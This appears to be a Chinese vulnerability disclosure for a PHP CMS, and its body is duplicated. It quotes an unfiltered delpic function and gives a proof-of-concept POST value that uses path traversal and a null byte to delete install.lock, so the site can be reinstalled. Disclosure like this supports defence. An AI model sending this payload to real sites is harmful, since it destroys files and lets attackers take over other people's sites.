VULHUB ™

### 简要描述： 2014年8月11日早上下载的源码 应该最新了 某处过滤不严 ### 详细说明： ``` \protected\apps\member\controller\photoController.php ``` 下的delpic函数 ``` public function delpic() { if(empty($_POST['picname'])) $this->error('参数错误~'); $picname=trim($_POST['picname']); $path=$this->uploadpath; $lasts=strtolower(substr($picname,-3)); if(in_array($lasts,array('gif','jpg','png','bmp'))){ if(file_exists($path.$picname)) @unlink($path.$picname); else exit('图片不存在~'); if(file_exists($path.'thumb_'.$picname)) @unlink($path.'thumb_'.$picname); else exit('缩略图不存在~'); echo '原图以及缩略图删除成功~'; }else echo $lasts; } ``` $picname=trim($_POST['picname']); 直接通过POST获取 没有过滤 最后检查了下后缀名 所以 直接截断就行了 Poc 首先注册会员 登录 POST提交 picname=../../protected/apps/install/install.lock%00a.jpg 到 http://localhost:8080/YX/index.php?r=member/photo/delpic 访问首页进行重装 [<img src="https://images.seebug.org/upload/201408/11152055a527ce5b61cac9332d9b2155d8166287.png" alt="3.png" width="600"...

### 简要描述： 2014年8月11日早上下载的源码 应该最新了 某处过滤不严 ### 详细说明： ``` \protected\apps\member\controller\photoController.php ``` 下的delpic函数 ``` public function delpic() { if(empty($_POST['picname'])) $this->error('参数错误~'); $picname=trim($_POST['picname']); $path=$this->uploadpath; $lasts=strtolower(substr($picname,-3)); if(in_array($lasts,array('gif','jpg','png','bmp'))){ if(file_exists($path.$picname)) @unlink($path.$picname); else exit('图片不存在~'); if(file_exists($path.'thumb_'.$picname)) @unlink($path.'thumb_'.$picname); else exit('缩略图不存在~'); echo '原图以及缩略图删除成功~'; }else echo $lasts; } ``` $picname=trim($_POST['picname']); 直接通过POST获取 没有过滤 最后检查了下后缀名 所以 直接截断就行了 Poc 首先注册会员 登录 POST提交 picname=../../protected/apps/install/install.lock%00a.jpg 到 http://localhost:8080/YX/index.php?r=member/photo/delpic 访问首页进行重装 [<img src="https://images.seebug.org/upload/201408/11152055a527ce5b61cac9332d9b2155d8166287.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/11152055a527ce5b61cac9332d9b2155d8166287.png) ### 漏洞证明： ``` POST提交 picname=../../protected/apps/install/install.lock%00a.jpg ``` [<img src="https://images.seebug.org/upload/201408/111521318dc915e4896dfbe8d6a906cc5f599f5d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/111521318dc915e4896dfbe8d6a906cc5f599f5d.png) 删除lock成功 [<img src="https://images.seebug.org/upload/201408/111521575d6e599ae7723a5b7dafd8ce6bd846c8.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/111521575d6e599ae7723a5b7dafd8ce6bd846c8.png) 访问首页重装 [<img src="https://images.seebug.org/upload/201408/111522469906d994b376bcb454b4a4165fe0e977.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/111522469906d994b376bcb454b4a4165fe0e977.png)